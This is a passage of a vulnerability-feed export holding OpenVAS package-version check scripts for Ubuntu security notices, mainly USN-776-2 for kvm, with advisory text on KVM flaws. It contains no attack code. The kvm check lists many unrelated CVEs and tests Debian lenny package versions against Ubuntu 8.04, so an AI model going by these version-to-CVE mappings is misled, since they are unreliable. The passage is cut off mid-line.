rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"079-0ubuntu35.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"volumeid\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:30:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update to kvm\nannounced via advisory USN-776-2.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64175", "id": "OPENVAS:64175", "title": "Ubuntu USN-776-2 (kvm)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_776_2.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_776_2.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-776-2 (kvm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 8.04 LTS:\n kvm 1:62+dfsg-0ubuntu8.2\n\nAfter a standard system upgrade you need to restart all KVM VMs to effect\nthe necessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-776-2\";\n\ntag_insight = \"USN-776-1 fixed vulnerabilities in KVM. Due to an incorrect fix, a\nregression was introduced in Ubuntu 8.04 LTS that caused KVM to fail to\nboot virtual machines started via libvirt. This update fixes the problem.\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\n Avi Kivity discovered that KVM did not correctly handle certain disk\n formats. A local attacker could attach a malicious partition that would\n allow the guest VM to read files on the VM host. (CVE-2008-1945,\n CVE-2008-2004)\n\n Alfredo Ortega discovered that KVM's VNC protocol handler did not\n correctly validate certain messages. A remote attacker could send\n specially crafted VNC messages that would cause KVM to consume CPU\n resources, leading to a denial of service. (CVE-2008-2382)\n\n Jan Niehusmann discovered that KVM's Cirrus VGA implementation over VNC\n did not correctly handle certain bitblt operations. A local attacker could\n exploit this flaw to potentially execute arbitrary code on the VM host or\n crash KVM, leading to a denial of service. (CVE-2008-4539)\n\n It was discovered that KVM's VNC password checks did not use the correct\n length. A remote attacker could exploit this flaw to cause KVM to crash,\n leading to a denial of service. (CVE-2008-5714)\";\ntag_summary = \"The remote host is missing an update to kvm\nannounced via advisory USN-776-2.\";\n\n \n\n\nif(description)\n{\n script_id(64175);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2008-1945\", \"CVE-2008-2004\", \"CVE-2008-2382\", \"CVE-2008-4539\", \"CVE-2008-5714\", \"CVE-2009-1130\", \"CVE-2009-1574\", \"CVE-2009-0714\", \"CVE-2008-1517\", \"CVE-2007-2807\", \"CVE-2009-0159\", \"CVE-2009-1252\", \"CVE-2009-1578\", \"CVE-2009-1579\", \"CVE-2009-1580\", \"CVE-2009-1581\", \"CVE-2009-1418\", \"CVE-2009-0028\", \"CVE-2009-0269\", \"CVE-2009-0342\", \"CVE-2009-0343\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-1184\", \"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\", \"CVE-2009-0154\", \"CVE-2009-1150\", \"CVE-2009-1151\", \"CVE-2009-0922\", \"CVE-2009-1632\", \"CVE-2009-0945\", \"CVE-2009-0688\", \"CVE-2009-1527\", \"CVE-2009-1338\", \"CVE-2009-1242\", \"CVE-2009-1192\", \"CVE-2009-1439\", \"CVE-2009-1337\", \"CVE-2009-0157\", \"CVE-2008-5077\", \"CVE-2008-5814\", \"CVE-2009-0721\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1072\", \"CVE-2009-1265\", \"CVE-2009-1011\", \"CVE-2009-1010\", \"CVE-2009-1009\", \"CVE-2009-1161\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-776-2 (kvm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-776-2/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kvm-source\", ver:\"62+dfsg-0ubuntu8.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kvm\", ver:\"62+dfsg-0ubuntu8.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-refclock\", ver:\"4.2.2.p4+dfsg-2etch3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-simple\", ver:\"4.2.2.p4+dfsg-2etch3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"1.4.15-4+lenny1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.26-2\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-generic\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-alpha\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-xen\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-openvz\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-vserver\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"user-mode-linux\", ver:\"2.6.26-1um-2+15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-arm\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-armel\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-hppa\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-i386\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-ia64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mips\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mipsel\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += 